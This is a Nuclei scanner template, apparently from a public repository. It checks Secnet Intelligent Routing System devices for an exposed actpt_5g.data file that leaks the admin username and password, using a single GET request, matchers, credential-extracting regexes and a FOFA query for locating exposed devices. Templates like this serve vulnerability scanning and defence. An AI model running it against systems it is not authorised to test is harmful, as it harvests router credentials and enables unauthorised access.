41 lines
1.1 KiB
YAML
41 lines
1.1 KiB
YAML
id: secnet-info-leak
|
|
|
|
info:
|
|
name: Secnet Intelligent Routing System actpt_5g.data - Information Leak
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/lNlI5ZtUJG50ipS0WfytUw
|
|
- https://github.com/gobysec/GobyVuls/blob/master/secnet_Intelligent_Router_actpt_5g.data_Infoleakage.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: title="安网-智能路由系统" || header="HTTPD_ac 1.0"
|
|
tags: info-leak,secnet,misconfig
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/actpt_5g.data"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"http_username":'
|
|
- '"http_passwd":'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"http_username":"([a-z]+)"'
|
|
- '"http_passwd":"([a-z]+)"'
|
|
# digest: 4a0a0047304502204fb99cc04164f951a41908f62b65fa4a67c1ae31b61ebe7ec3d9a9d1b149cc1d0221008cab8130d025969bf2abcd0e2f4f7662963a9e5991430277e2306fb29c5e2e84:922c64590222798bb761d5b6d8e72950 |